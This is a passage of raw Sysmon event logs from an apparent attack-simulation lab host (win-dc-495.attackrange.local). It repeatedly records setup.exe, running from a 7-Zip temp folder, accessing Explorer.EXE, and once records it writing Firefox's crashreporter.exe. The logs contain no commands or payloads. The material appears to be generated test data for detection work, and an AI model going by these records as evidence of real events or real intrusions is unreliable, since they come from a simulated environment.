s.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014633Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.255{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000014632Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.255{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64) 10341000x800000000000000014631Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.255{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000014630Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.255{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000014629Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.255{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64) 10341000x800000000000000014628Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.255{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 11241100x800000000000000014627Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localEXE2021-01-18 13:59:52.255{59A5CD1D-9457-6005-2B05-00000000A301}6900C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exeC:\Program Files\Mozilla Firefox\crashreporter.exe2021-01-18 13:59:52.255 10341000x800000000000000014626Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.255{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014625Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.255{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014624Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.255{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014623Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.255{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000014622Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.255{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014621Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.255{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014620Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.255{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3 10341000x800000000000000014619Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.255{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014618Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.255{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014617Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.255{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014616Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.255{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000014615Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 